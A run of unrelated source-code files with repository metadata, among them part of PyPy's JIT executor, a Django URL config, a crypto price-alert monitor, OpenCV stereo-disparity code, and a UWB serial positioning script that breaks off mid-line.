raise AssertionError("cannot store GC pointers in gc_store_indexed for now")
elif arraydescr.is_array_of_floats():
floatval = valuebox.getfloatstorage()
cpu.bh_gc_store_indexed_f(addr, index, floatval, scale, base_ofs, bytes,
arraydescr)
else:
intval = valuebox.getint()
cpu.bh_gc_store_indexed_i(addr, index, intval, scale, base_ofs, bytes,
arraydescr)
def exec_new_with_vtable(cpu, descr):
return cpu.bh_new_with_vtable(descr)
def do_new_with_vtable(cpu, _, clsbox):
return exec_new_with_vtable(cpu, clsbox)
def do_int_add_ovf(cpu, metainterp, box1, box2):
# the overflow operations can be called without a metainterp, if an
# overflow cannot occur
a = box1.getint()
b = box2.getint()
try:
z = ovfcheck(a + b)
except OverflowError:
assert metainterp is not None
metainterp.ovf_flag = True
z = 0
return z
def do_int_sub_ovf(cpu, metainterp, box1, box2):
a = box1.getint()
b = box2.getint()
try:
z = ovfcheck(a - b)
except OverflowError:
assert metainterp is not None
metainterp.ovf_flag = True
z = 0
return z
def do_int_mul_ovf(cpu, metainterp, box1, box2):
a = box1.getint()
b = box2.getint()
try:
z = ovfcheck(a * b)
except OverflowError:
assert metainterp is not None
metainterp.ovf_flag = True
z = 0
return z
def do_same_as_i(cpu, _, v):
return v.getint()
def do_same_as_r(cpu, _, v):
return v.getref_base()
def do_same_as_f(cpu, _, v):
return v.getfloatstorage()
def do_copystrcontent(cpu, _, srcbox, dstbox,
srcstartbox, dststartbox, lengthbox):
src = srcbox.getref(lltype.Ptr(rstr.STR))
dst = dstbox.getref(lltype.Ptr(rstr.STR))
srcstart = srcstartbox.getint()
dststart = dststartbox.getint()
length = lengthbox.getint()
rstr.copy_string_contents(src, dst, srcstart, dststart, length)
def do_copyunicodecontent(cpu, _, srcbox, dstbox,
srcstartbox, dststartbox, lengthbox):
src = srcbox.getref(lltype.Ptr(rstr.UNICODE))
dst = dstbox.getref(lltype.Ptr(rstr.UNICODE))
srcstart = srcstartbox.getint()
dststart = dststartbox.getint()
length = lengthbox.getint()
rstr.copy_unicode_contents(src, dst, srcstart, dststart, length)
def do_keepalive(cpu, _, x):
pass
def do_assert_not_none(cpu, _, box):
if not box.getref_base():
fatalerror("found during JITting: ll_assert_not_none() failed")
# ____________________________________________________________
def _make_execute_list():
execute_by_num_args = {}
for key in opname.values():
value = getattr(rop, key)
if not key.startswith('_'):
if (rop._FINAL_FIRST <= value <= rop._FINAL_LAST or
rop._GUARD_FIRST <= value <= rop._GUARD_LAST):
continue
# find which list to store the operation in, based on num_args
num_args = resoperation.oparity[value]
withdescr = resoperation.opwithdescr[value]
dictkey = num_args, withdescr
if dictkey not in execute_by_num_args:
execute_by_num_args[dictkey] = [None] * (rop._LAST+1)
execute = execute_by_num_args[dictkey]
#
if execute[value] is not None:
raise AssertionError("duplicate entry for op number %d"% value)
#
# Fish for a way for the pyjitpl interpreter to delegate
# really running the operation to the blackhole interpreter
# or directly to the cpu. First try the do_xxx() functions
# explicitly encoded above:
name = 'do_' + key.lower()
if name in globals():
execute[value] = globals()[name]
continue
#
# Maybe the same without the _PURE suffix?
if key[-7:-2] == '_PURE':
key = key[:-7] + key[-2:]
name = 'do_' + key.lower()
if name in globals():
execute[value] = globals()[name]
continue
#
# If missing, fallback to the bhimpl_xxx() method of the
# blackhole interpreter. This only works if there is a
# method of the exact same name and it accepts simple
# parameters.
name = 'bhimpl_' + key.lower()
if hasattr(BlackholeInterpreter, name):
func = make_execute_function(
key.lower(),
getattr(BlackholeInterpreter, name).im_func)
if func is not None:
execute[value] = func
continue
if value in (rop.FORCE_TOKEN,
rop.CALL_ASSEMBLER_R,
rop.CALL_ASSEMBLER_F,
rop.CALL_ASSEMBLER_I,
rop.CALL_ASSEMBLER_N,
rop.INCREMENT_DEBUG_COUNTER,
rop.COND_CALL_VALUE_R,
rop.COND_CALL_VALUE_I,
rop.COND_CALL_GC_WB,
rop.COND_CALL_GC_WB_ARRAY,
rop.ZERO_ARRAY,
rop.DEBUG_MERGE_POINT,
rop.JIT_DEBUG,
rop.ENTER_PORTAL_FRAME,
rop.LEAVE_PORTAL_FRAME,
rop.SETARRAYITEM_RAW,
rop.SETINTERIORFIELD_RAW,
rop.CALL_RELEASE_GIL_I,
rop.CALL_RELEASE_GIL_F,
rop.CALL_RELEASE_GIL_N,
rop.QUASIIMMUT_FIELD,
rop.CHECK_MEMORY_ERROR,
rop.CALL_MALLOC_NURSERY,
rop.CALL_MALLOC_NURSERY_VARSIZE,
rop.CALL_MALLOC_NURSERY_VARSIZE_FRAME,
rop.NURSERY_PTR_INCREMENT,
rop.LABEL,
rop.ESCAPE_I,
rop.ESCAPE_N,
rop.ESCAPE_R,
rop.ESCAPE_F,
rop.FORCE_SPILL,
rop.SAVE_EXC_CLASS,
rop.SAVE_EXCEPTION,
rop.RESTORE_EXCEPTION,
rop.VEC_LOAD_I,
rop.VEC_LOAD_F,
rop.GC_LOAD_I,
rop.GC_LOAD_R,
rop.GC_LOAD_F,
rop.GC_LOAD_INDEXED_R,
rop.VEC_STORE,
rop.GC_STORE,
rop.GC_STORE_INDEXED,
rop.LOAD_FROM_GC_TABLE,
rop.LOAD_EFFECTIVE_ADDRESS,
rop.RECORD_KNOWN_RESULT,
): # list of opcodes never executed by pyjitpl
continue
if rop._VEC_PURE_FIRST <= value <= rop._VEC_PURE_LAST:
continue
raise AssertionError("missing %r" % (key,))
return execute_by_num_args
def make_execute_function(name, func):
# Make a wrapper for 'func'. The func is a simple bhimpl_xxx function
# from the BlackholeInterpreter class. The wrapper is a new function
# that receives boxed values (but returns a non-boxed value).
for argtype in func.argtypes:
if argtype not in ('i', 'r', 'f', 'd', 'cpu'):
return None
if list(func.argtypes).count('d') > 1:
return None
argtypes = unrolling_iterable(func.argtypes)
#
def do(cpu, _, *argboxes):
newargs = ()
for argtype in argtypes:
if argtype == 'cpu':
value = cpu
elif argtype == 'd':
value = argboxes[-1]
assert isinstance(value, AbstractDescr)
argboxes = argboxes[:-1]
else:
argbox = argboxes[0]
argboxes = argboxes[1:]
if argtype == 'i': value = argbox.getint()
elif argtype == 'r': value = argbox.getref_base()
elif argtype == 'f': value = argbox.getfloatstorage()
newargs = newargs + (value,)
assert not argboxes
#
return func(*newargs)
#
do.__name__ = 'do_' + name
return do
@specialize.memo()
def get_execute_funclist(num_args, withdescr):
# workaround, similar to the next one
return EXECUTE_BY_NUM_ARGS[num_args, withdescr]
@specialize.memo()
def get_execute_function(opnum, num_args, withdescr):
# workaround for an annotation limitation: putting this code in
# a specialize:memo function makes sure the following line is
# constant-folded away. Only works if opnum and num_args are
# constants, of course.
func = EXECUTE_BY_NUM_ARGS[num_args, withdescr][opnum]
#assert func is not None, "EXECUTE_BY_NUM_ARGS[%s, %s][%s]" % (
# num_args, withdescr, resoperation.opname[opnum])
return func
@specialize.memo()
def has_descr(opnum):
# workaround, similar to the previous one
return resoperation.opwithdescr[opnum]
@specialize.arg(2)
def execute(cpu, metainterp, opnum, descr, *argboxes):
# only for opnums with a fixed arity
num_args = len(argboxes)
withdescr = has_descr(opnum)
if withdescr:
check_descr(descr)
argboxes = argboxes + (descr,)
else:
assert descr is None
func = get_execute_function(opnum, num_args, withdescr)
return func(cpu, metainterp, *argboxes) # note that the 'argboxes' tuple
# optionally ends with the descr
@specialize.arg(2)
def execute_varargs(cpu, metainterp, opnum, argboxes, descr):
# only for opnums with a variable arity (calls, typically)
check_descr(descr)
func = get_execute_function(opnum, -1, True)
return func(cpu, metainterp, argboxes, descr)
@specialize.argtype(0)
def wrap_constant(value):
if lltype.typeOf(value) == lltype.Signed:
return ConstInt(value)
elif isinstance(value, bool):
return ConstInt(int(value))
elif lltype.typeOf(value) == longlong.FLOATSTORAGE:
return ConstFloat(value)
elif isinstance(value, float):
return ConstFloat(longlong.getfloatstorage(value))
else:
assert lltype.typeOf(value) == llmemory.GCREF
return ConstPtr(value)
def constant_from_op(op):
if op.type == 'i':
return ConstInt(op.getint())
elif op.type == 'r':
return ConstPtr(op.getref_base())
else:
assert op.type == 'f'
return ConstFloat(op.getfloatstorage())
unrolled_range = unrolling_iterable(range(rop._LAST))
def execute_nonspec_const(cpu, metainterp, opnum, argboxes, descr=None,
type='i'):
for num in unrolled_range:
if num == opnum:
return wrap_constant(_execute_arglist(cpu, metainterp, num,
argboxes, descr))
assert False
@specialize.arg(2)
def _execute_arglist(cpu, metainterp, opnum, argboxes, descr=None):
arity = resoperation.oparity[opnum]
assert arity == -1 or len(argboxes) == arity
if resoperation.opwithdescr[opnum]:
check_descr(descr)
if arity == -1:
func = get_execute_function(opnum, -1, True)
if func:
return func(cpu, metainterp, argboxes, descr)
if arity == 0:
func = get_execute_function(opnum, 0, True)
if func:
return func(cpu, metainterp, descr)
if arity == 1:
func = get_execute_function(opnum, 1, True)
if func:
return func(cpu, metainterp, argboxes[0], descr)
if arity == 2:
func = get_execute_function(opnum, 2, True)
if func:
return func(cpu, metainterp, argboxes[0], argboxes[1], descr)
if arity == 3:
func = get_execute_function(opnum, 3, True)
if func:
return func(cpu, metainterp, argboxes[0], argboxes[1],
argboxes[2], descr)
else:
assert descr is None
if arity == 1:
func = get_execute_function(opnum, 1, False)
if func:
return func(cpu, metainterp, argboxes[0])
if arity == 2:
func = get_execute_function(opnum, 2, False)
if func:
return func(cpu, metainterp, argboxes[0], argboxes[1])
if arity == 3:
func = get_execute_function(opnum, 3, False)
if func:
return func(cpu, metainterp, argboxes[0], argboxes[1],
argboxes[2])
if arity == 5: # copystrcontent, copyunicodecontent
func = get_execute_function(opnum, 5, False)
if func:
return func(cpu, metainterp, argboxes[0], argboxes[1],
argboxes[2], argboxes[3], argboxes[4])
raise NotImplementedError
EXECUTE_BY_NUM_ARGS = _make_execute_list()
| mozillazg/pypy | rpython/jit/metainterp/executor.py | executor.py | py | 23,295 | python | en | code | 430 | github-code | 36 |
12085831934 | from django.urls import re_path, include
from registration import views
from django.contrib.auth import views as auth_views
urlpatterns = [
re_path(r'^login/$', auth_views.login, name='login'),
re_path(r'^logout/$', auth_views.logout, {'next_page': '/'}, name='logout'),
re_path(r'^signup/$', views.signup, name='signup'),
re_path(r'^profile/(?P<pk>\d+)$', views.view_profile, name='view_profile'),
re_path(r'^profile/(?P<pk>\d+)$', views.view_profile, name='edit_profile'),
re_path(r'^approve', views.approve_and_close, name='approve_and_close')
]
| rgeurgas/Sid | registration/urls.py | urls.py | py | 575 | python | en | code | 0 | github-code | 36 |
12868339424 | from typing import List
from name_genie.common import data_dao_stem, data_dao_male_suffix, data_dao_female_suffix, data_shared_dao, data_shared_thing, data_shared_adj, data_shared_number
from name_genie.util import to_str
import random
__all__ = ['get_daos']
stems = data_dao_stem + data_shared_dao + data_shared_thing + data_shared_adj + data_shared_number
suffixes = data_dao_male_suffix + data_dao_female_suffix
def get_daos(count: int = 10,
gender: int | None = None,
stem: str | None = None,
suffix: str | None = None) -> List[str]:
"""
生成道号
生成算法:(stem) + (suffix)
:param count: 数量
:param gender: 性别: 1 - 男; 2 - 女
:param stem: 词干
:param suffix: 后缀
:return:
"""
names: List[str] = []
for i in range(count):
gender2 = gender
stem2 = stem
suffix2 = suffix
if stem2 is None:
stem2 = random.choice(stems)
if suffix2 is None:
if gender2 == 1:
suffix2 = random.choice(data_dao_male_suffix)
elif gender2 == 2:
suffix2 = random.choice(data_dao_female_suffix)
else:
suffix2 = random.choice(suffixes)
name = to_str(stem2) + to_str(suffix2)
names.append(name)
return names
if __name__ == '__main__':
print(get_daos())
| name-genie/name-genie-python | name_genie/dao.py | dao.py | py | 1,399 | python | en | code | 0 | github-code | 36 |
8562919260 | import time
import threading
import json
import datetime
from collections import deque
import ctypes
import os
import UpbitWrapper
from playsound import playsound
ALARM_SWITCH = True
SOUND_SWITCH = True
def tdstr(td):
days = ""
hours = ""
minutes = ""
seconds = "0"
ms = ""
if td.days != 0:
days = f"{td.days}일 "
if td.seconds // 3600 != 0:
hours = f"{td.seconds // 3600}시간 "
if (td.seconds % 3600) // 60 != 0:
minutes = f"{(td.seconds % 3600) // 60:0>2d}분 "
if td.seconds % 60 != 0:
seconds = f"{td.seconds % 60}"
if td.microseconds != 0:
ms = f".{td.microseconds:1.0f}"
return days + hours + minutes + seconds + ms + "초"
class Ticker:
def __init__(self, market_name, market_cap, price, timestamp):
self.market_name = market_name
self.market_cap = market_cap
self.price = price
self.timestamp = timestamp
class MarketMonitor:
def __init__(self, change, market, interval, cooldown):
self.market_code = market
self.change = change
self.interval = interval
self.cooldown = cooldown
self.container = deque()
self.is_active = True
self.time_disabled = 0
def state_report(self):
print('---------------')
print(f"is_active: {self.is_active}")
print(f"ALARM_SWITCH: {ALARM_SWITCH}")
print(f"num_item: {len(self.container)}")
#for i in range(len(self.container)):
# print(f"price: {self.container[i].price} time: {self.container[i].timestamp}")
print('---------------')
def update_ticker(self, item):
# self.state_report()
# print(f"newcomer: {item.timestamp}")
# restore alarm if disabled
if self.is_active == False:
alarm_checked = False
timestamp_now = datetime.datetime.now().timestamp()
if self.time_disabled + self.cooldown < timestamp_now:
self.is_active = True
# add an item
idx = 0
if len(self.container) == 0:
self.container.append(item)
return None
while idx < len(self.container) and \
self.container[idx].timestamp >= item.timestamp:
# print(f"<<comparing {self.container[idx].timestamp} and {item.timestamp}")
if self.container[idx].timestamp == item.timestamp:
return None
idx += 1
if idx == len(self.container):
self.container.append(item)
else:
self.container.insert(idx, item)
# determine the newest
first = self.container.popleft()
self.container.appendleft(first)
# determine the last
last = self.container.pop()
if last.timestamp + self.interval > first.timestamp:
self.container.append(last)
return None
# determine the last outranged
outranged = last
while last.timestamp + self.interval < item.timestamp and \
last != item:
outranged = last
last = self.container.pop()
self.container.append(last)
true_interval = item.timestamp - outranged.timestamp
true_change = (item.price - outranged.price) / item.price
# if satisfies condition, send off an alarm
if abs(true_change) > self.change and true_change * self.change > 0 and self.is_active:
self.time_disabled = datetime.datetime.now().timestamp()
self.is_active = False
return Alarm(first.timestamp, self.market_code, first.market_name, 0, true_change, true_interval)
class Alarm:
def __init__(self, time, market_code, market_name, market_cap, d_ratio, d_time):
# text = market_code_to_kor[self.market_code] + "(" + self.market + "): "
self.time = time
self.text = market_name + "(" + market_code + "): "
self.text += "지난 " + tdstr(datetime.timedelta(seconds=d_time)) + " 동안"
self.text += f"{d_ratio * 100:.3f}% 변화했습니다\n"
# self.text += f"현재 시세는 {cur_price:.2f}, 현재 시간은 {datetime.datetime.fromtimestamp(time)} 입니다"
self.text += f"현재 시간은 {datetime.datetime.fromtimestamp(time)} 입니다"
def __str__(self):
return self.text
class Criteria:
def __init__(self, cid, d_ratio, d_time, cooldown):
self.cid = cid
self.d_ratio = d_ratio
self.d_time = d_time
self.cooldown = cooldown
self.monitor_dict = {}
def add_monitor(self, new_market):
new_monitor = MarketMonitor(self.d_ratio, new_market, self.d_time, self.cooldown)
self.monitor_dict[new_market] = new_monitor
def update_monitors(self, new_items):
alarms = []
for market, item in new_items.items():
if market not in self.monitor_dict.keys():
self.add_monitor(market)
ret = self.monitor_dict[market].update_ticker(item)
if ret != None:
alarms.append(ret)
return alarms
class Monitor:
def __init__(self):
self.criteria_id = 1
self.criteria = []
self.criteria_lock = threading.Lock()
self.message = deque()
self.message_lock = threading.Lock()
self.alarm_window_num = 0
self.alarm_window_lock = threading.Lock()
def update_messages(self, new_messages):
self.message_lock.acquire(blocking=True)
for msg in new_messages:
idx = 0
while idx < len(self.message) and msg.time >= self.message[idx].time:
idx += 1
if idx == len(self.message):
self.message.append(msg)
else:
self.message.insert(idx, msg)
if len(self.message) < 1:
self.message_lock.release()
return
first = self.message.popleft()
self.message.appendleft(first)
while len(self.message) > 0:
last = self.message.pop()
if last.time + 86400 > first.time:
self.message.append(last)
break
self.message_lock.release()
def alarm_thread_func(self, alarm):
if SOUND_SWITCH:
playsound('./alarm.wav')
if not ALARM_SWITCH or self.alarm_window_num > 10:
return
self.alarm_window_lock.acquire(blocking=True)
self.alarm_window_num += 1
self.alarm_window_lock.release()
ctypes.windll.user32.MessageBoxW(0, alarm.text, "알림", 0)
self.alarm_window_lock.acquire(blocking=True)
self.alarm_window_num -= 1
self.alarm_window_lock.release()
def send_alarm(self, alarm):
threading.Thread(target=Monitor.alarm_thread_func, args=(self, alarm)).start()
def _monitor(self):
new_messages = []
markets = UpbitWrapper.get_all_markets()
if markets == None:
return
r_dict = UpbitWrapper.get_tickers(markets)
if r_dict == None:
return
market_tickers = {} # dict, key: market code
for market in r_dict:
if "KRW" not in market['market']:
continue
cur_price = market['trade_price']
timestamp = market['timestamp'] / 1e3
item = Ticker(markets[market['market']], 0, cur_price, timestamp)
market_tickers[market['market']] = item
self.criteria_lock.acquire(blocking=True)
for criterion in self.criteria:
new_messages.extend(criterion.update_monitors(market_tickers))
self.criteria_lock.release()
self.update_messages(new_messages)
for msg in new_messages:
self.send_alarm(msg)
return
def _monitor_wrapper(self):
self._monitor()
threading.Timer(0.05, Monitor._monitor_wrapper, args=(self,)).start()
def start(self):
threading.Thread(target=Monitor._monitor_wrapper, args=(self,)).start()
def add_criteria(self, d_ratio, d_time, cooldown):
new_criteria = Criteria(self.criteria_id, d_ratio, d_time, cooldown)
self.criteria_id += 1
self.criteria_lock.acquire(blocking=True)
self.criteria.append(new_criteria)
self.criteria_lock.release()
return self.criteria_id - 1
def list_criteria(self):
text = ""
self.criteria_lock.acquire(blocking=True)
for c in self.criteria:
text += f"알람 ID: {c.cid} 변화율: {c.d_ratio * 100}% 시간 간격: {datetime.timedelta(seconds=c.d_time)} 알람 주기: {datetime.timedelta(seconds=c.cooldown)}"
self.criteria_lock.release()
return text
def remove_criteria(self, cid):
i = 0
self.criteria_lock.acquire(blocking=True)
for i in range(len(self.criteria)):
if self.criteria[i].cid == cid:
self.criteria.pop(i)
self.criteria_lock.release()
return True
self.criteria_lock.release()
return False
def list_messages(self):
text = ""
self.message_lock.acquire(blocking=True)
for item in self.message:
text += "-----------------------------------------------\n"
text += str(datetime.datetime.fromtimestamp(item.time)) + "\n"
text += item.text + "\n"
self.message_lock.release()
return text
monitor = Monitor()
monitor.start()
print("===============================")
print("환영합니다! 도움말은 h를 입력하세요")
print("주의: 알람 메세지 박스는 최신이 아닐 수 있습니다")
print("주의: m을 입력해 메세지함을 사용하세요")
print("===============================")
while True:
print(">> ", end=' ')
user_input = input().lower()
if user_input == 'h':
help_text = "도움말은 h를 입력하세요\n \
알람 추가는 a를 입력하세요\n \
알람 목록 보기는 l을 입력하세요\n \
알람 삭제를 위해선 r <알람 ID>를 입력하세요 (예시: r 3)\n \
전체 알람 끄기/켜기는 d을 입력하세요\n \
알람 소리 끄기/켜기는 s을 입력하세요\n \
메세지함은 m을 입력하세요"
print(help_text)
if user_input == 'q':
os._exit(0)
if user_input[:1] == 'r':
cid = 0
while True:
try:
cid = int(user_input[1:])
except:
print("잘못 입력하셨습니다. 처음으로 돌아갑니다.")
continue
break
if monitor.remove_criteria(cid) == False:
print("알람을 성공적으로 삭제했습니다")
else:
print("대상 알람 ID를 찾을 수 없습니다")
if user_input == 'l':
text = monitor.list_criteria()
print(text)
if user_input == 'm':
print(monitor.list_messages())
if user_input == 'd':
if ALARM_SWITCH:
ALARM_SWITCH = False
print("모든 알람이 꺼졌습니다")
else:
ALARM_SWITCH = True
print("알람이 다시 작동합니다")
if user_input == 's':
if SOUND_SWITCH:
SOUND_SWITCH = False
print("곧 모든 소리가 꺼집니다")
else:
SOUND_SWITCH = True
print("소리가 켜졌습니다")
if user_input == 'a':
print("알람을 추가합니다")
while True:
try:
print("변화율을 입력하세요 (% 단위): ")
change = float(input()) / 100
except:
continue
break
if change == 0:
print("변화율은 0%가 될 수 없습니다. 처음으로 돌아갑니다")
continue
print("시간 간격을 입력하세요: 입력하신 시간 간격 동안 변화율 이상의 변화가 감지되면 알림을 내보냅니다")
print("------------")
min = sec = 0
while True:
try:
print("분을 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 30을 입력): ", end='')
min = int(input())
except:
continue
break
while True:
try:
print("초를 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 12.52를 입력): ", end='')
sec = float(input())
except:
continue
break
interval = datetime.timedelta(minutes=min, seconds=sec).total_seconds()
if interval == 0:
print("시간 간격은 0이 될 수 없습니다. 처음으로 돌아갑니다")
continue
print("알람 주기를 입력하세요: 알람이 울린 후 다시 울리기까지 걸리는 시간입니다")
print("------------")
min = 0
while True:
try:
print("분을 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 30을 입력): ", end='')
min = int(input())
except:
continue
break
cooldown = datetime.timedelta(minutes=min).total_seconds()
if cooldown == 0:
print("알람 주기는 0이 될 수 없습니다. 처음으로 돌아갑니다")
continue
cid = monitor.add_criteria(change, interval, cooldown)
if cid > 0:
print(f"알람이 성공적으로 추가됐습니다. 알람 ID: <{cid}>")
| livelykitten/Coinwork | Document1.py | Document1.py | py | 11,579 | python | en | code | 0 | github-code | 36 |
35029256291 | from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.pyplot as plt
import numpy as np
from collections.abc import Iterable
def colorbar(mappable, pad=0.1, side="right"):
'''
colorbar whose height (or width) in sync with the master axe
https://matplotlib.org/mpl_toolkits/axes_grid/users/overview.html#colorbar-whose-height-or-width-in-sync-with-the-master-axes
'''
ax = mappable.axes
fig = ax.figure
divider = make_axes_locatable(ax)
cax = divider.append_axes(side, size="5%", pad=pad)
return fig.colorbar(mappable, cax=cax)
def colorbar2(mappable, shift=0.05, width=0.05, ax=None, trim_left=0, trim_right=0, side="right"):
# creates a color bar that does not shrink the main plot or panel
# only works for horizontal bars so far
if ax is None:
ax = mappable.axes
# Get current figure dimensions
try:
fig = ax.figure
p = np.zeros([1,4])
p[0,:] = ax.get_position().get_points().flatten()
except:
fig = ax[0].figure
p = np.zeros([ax.size,4])
for k, a in enumerate(ax):
p[k,:] = a.get_position().get_points().flatten()
xmin = np.amin(p[:,0]) ; xmax = np.amax(p[:,2]) ; dx = xmax - xmin
ymin = np.amin(p[:,1]) ; ymax = np.amax(p[:,3]) ; dy = ymax - ymin
if side=="top":
cax = fig.add_axes([xmin + trim_left, ymax + shift * dy, dx - trim_left - trim_right, width * dx])
cax.xaxis.set_ticks_position('top')
return fig.colorbar(mappable, cax=cax, orientation="horizontal")
elif side=="right":
cax = fig.add_axes([xmax + shift*dx, ymin, width * dx, dy])
cax.xaxis.set_ticks_position('top')
return fig.colorbar(mappable, cax=cax, orientation="vertical")
def shift_axes(axes,dx,dy):
# only 1 axis, we make it iterable
if not isinstance(axes, Iterable):
axes = [axes]
for ax in axes:
pos = ax.get_position()
pos = [pos.x0 + dx, pos.y0 + dy, pos.width, pos.height]
ax.set_position(pos)
def L2R(L,Teff):
'''
L2R(Lstar/Lsun,Teff) renvoie Rstar/Rsun
'''
return np.sqrt(L * (5777./Teff)**4)
def R2L(R,Teff):
'''
R2L(Rstar/Rsun,Teff) renvoie Lstar/Lsun
'''
return R**2 * (Teff/5777.)**4
def pdf(filename):
if (filename[-4:] != ".pdf"):
filename += ".pdf"
print(filename)
plt.savefig(filename, bbox_inches='tight')
| harrisonv789/Astro_Scripts | modules/colorbar_utils.py | colorbar_utils.py | py | 2,405 | python | en | code | 3 | github-code | 36 |
41946416343 |
import numpy as np
import cv2
import glob
from matplotlib import pyplot as plt
import os
from mpl_toolkits.mplot3d import axes3d, Axes3D
base_folder = os.getcwd() +'/parameters/'
s = cv2.FileStorage(base_folder + 'left_camera_intrinsics.xml', cv2.FileStorage_READ)
mtx_left = s.getNode('mtx_left').mat()
distCoeffs_left = s.getNode('distCoeffs_left').mat()
s.release()
s = cv2.FileStorage(base_folder + 'right_camera_intrinsics.xml', cv2.FileStorage_READ)
mtx_right = s.getNode('mtx_right').mat()
distCoeffs_right = s.getNode('distCoeffs_right').mat()
s.release()
s = cv2.FileStorage(base_folder + 'stereo_rectification.xml', cv2.FileStorage_READ)
R1 = s.getNode('R1').mat()
R2 = s.getNode('R2').mat()
Q = s.getNode('Q').mat()
s.release()
s = cv2.FileStorage(base_folder + 'P1.xml', cv2.FileStorage_READ)
P1 = s.getNode('P1').mat()
s = cv2.FileStorage(base_folder + 'P2.xml', cv2.FileStorage_READ)
P2 = s.getNode('P2').mat()
s.release()
img_folder = os.getcwd() + '/'
img_folder = os.getcwd() + '/'
img_l = cv2.imread(img_folder + 'images/task_3_and_4/left_4.png')
img_r= cv2.imread(img_folder + 'images/task_3_and_4/right_4.png')
height,width = img_l.shape[:2]
mapx1, mapy1 = cv2.initUndistortRectifyMap(mtx_left, distCoeffs_left, R1, mtx_left, (width,height), 5)
rectified_img_left = cv2.remap(img_l,mapx1, mapy1, cv2.INTER_LINEAR)
mapx2, mapy2 = cv2.initUndistortRectifyMap(mtx_right, distCoeffs_right,R2, mtx_right, (width,height), 5)
rectified_img_right = cv2.remap(img_r,mapx2, mapy2, cv2.INTER_LINEAR)
output_path = os.getcwd() + '/output/task_4'
cv2.imshow('rectified_img_l',rectified_img_left)
cv2.imwrite(output_path + '/rectified_img_left.png', rectified_img_left)
cv2.imshow('rectified_img_r',rectified_img_right)
cv2.imwrite(output_path + '/rectified_img_right.png', rectified_img_right)
window_size = 3
# Best parameter
left_matcher = cv2.StereoSGBM_create( minDisparity=0, numDisparities=160,blockSize=5, P1=8 * 3 * window_size ** 2,P2=32 * 3 * window_size ** 2,disp12MaxDiff=1,uniquenessRatio=15,speckleWindowSize=0,speckleRange=2, preFilterCap=63,mode=cv2.STEREO_SGBM_MODE_SGBM_3WAY)
#left_matcher = cv2.StereoSGBM_create(numDisparities=16, blockSize=15)
right_matcher = cv2.ximgproc.createRightMatcher(left_matcher)
# FILTER Parameters
lmbda = 10000
sigma = 1.2
visual_multiplier = 0.5
wls_filter = cv2.ximgproc.createDisparityWLSFilter(matcher_left=left_matcher)
wls_filter.setLambda(lmbda)
wls_filter.setSigmaColor(sigma)
displ = left_matcher.compute(img_l, img_r)
dispr = right_matcher.compute(img_r, img_l)
displ = np.int16(displ)
dispr = np.int16(dispr)
filteredImg = wls_filter.filter(displ, img_l, None, dispr)
filteredImg = cv2.normalize(src=filteredImg, dst=filteredImg, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX)
filteredImg = np.uint8(filteredImg)
cv2.imshow('Disparity Map', filteredImg)
cv2.imwrite(output_path+'/Disparity.png', filteredImg)
| YB-Joe/Perception_in_Robotics | project_2a/code/task_4/task_4.py | task_4.py | py | 2,903 | python | en | code | 0 | github-code | 36 |
22827039598 | import sqlite3
__author__ = 'marcelo_garay'
import os
class DBManager(object):
db_name = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../../../db/sicarios'))
def __init__(self):
"""
Make connection to an SQLite database file
:param db:
:return:
"""
self.conn = sqlite3.connect(self.db_name)
self.conn.execute('pragma foreign_keys = on')
self.conn.commit()
self.cur = self.conn.cursor()
def query(self, arg):
"""
Execute a query using the arg
:return
"""
self.cur.execute(arg)
self.conn.commit()
return self.cur
def close(self):
"""
Close connection to the database
"""
self.conn.close()
| edson-gonzales/SICARIOS | src/db/transactions/DBManager.py | DBManager.py | py | 825 | python | en | code | 0 | github-code | 36 |
39363534839 | import os, sys
import csv
import random
import signal
import socket
import threading
import time
import datetime
from fxpmath import Fxp
from Parse_DNN import *
from EKF_AoA import *
import numpy.matlib
import numpy as np
from numpy.linalg import inv
from numpy.core.fromnumeric import transpose
import math
from math import *
import pyvisa as visa
from colorama import Fore
import serial
import serial.tools.list_ports
import serial.serialutil
import matplotlib.pyplot as plt
# ---------------------------------TEST RUN CONFIGS---------------------------------------------------------------------
Rx_DEVICE_COM_PORT = 'com16' #responder COM Port
# ----------------------------------------------------------------------------------------------------------------------
# --------------------------------------NO EDITS BELOW------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------------
def serial_tx(my_port, command):
b_command = command.encode()
my_port.write(b_command)
def serial_rx(my_port):
line = my_port.read_until()
line = line.strip()
return line.decode("utf-8")
def serial_trx(my_port, command):
serial_tx(my_port, command)
return (serial_rx(my_port))
def save_csv(csvf, row):
with open(csvf, "a", newline="") as F:
w = csv.writer(F)
w.writerow(row)
class Unlab_SR150_Resp():
def __init__(self):
''' Set Baudrate '''
self.scpi_rx = serial.Serial(Rx_DEVICE_COM_PORT, baudrate=230400, timeout=6)
self.delay = 3 # delay setting(sec)
'''USER INPUT VARIABLES'''
self.ekf = EKF_AoA() # EKF Object Creation
# self.ref = np.array([0.0001, 1.25]) # reference position of tag
# h_anc = 1.20 # height of anchor(SECC)
# h_tag = 1.15 # height of tag(CAR)
# self.h_diff = h_anc - h_tag
def plot(self):
plt.cla()
plt.xlabel('X(m)', labelpad=20, size=14)
plt.ylabel('Y(m)', labelpad=20, size=14)
plt.axis([-5, 5, 0, 5])
plt.xticks(np.arange(-5, 5, 0.5))
plt.yticks(np.arange(0, 5, 0.5))
for i in range(0,10):
plt.axhline((i+1)/2, -5, 5, color='lightgray', linestyle='--', linewidth=0.7)
for i in range(0,20):
plt.vlines((i-10)/2, 0, 5, color='lightgray', linestyle='--', linewidth=0.7)
x = self.X[0,0]
y = self.X[1,0]
plt.scatter(x,y,color='r',s=450)
plt.pause(0.1)
def Positioning(self):
## Reset all ##
state_ntf_rx = serial_trx(self.scpi_rx, "RST\r\n")
print(state_ntf_rx)
time.sleep(self.delay)
## Ranging start ##
state_ntf_rx = serial_trx(self.scpi_rx, "UWB MTRESP ON\r\n") # Responder Session start Command
print(state_ntf_rx)
time.sleep(self.delay)
while 1:
self.scpi_ret = serial_rx(self.scpi_rx)
try:
## Data Parsing ##
result = self.scpi_ret.split(' ')
session_id = result[0]
distance = Fxp(val="0x"+result[5]+"0x"+result[4], signed=False, n_word=16, n_frac=0).astype(int).tolist() - 10
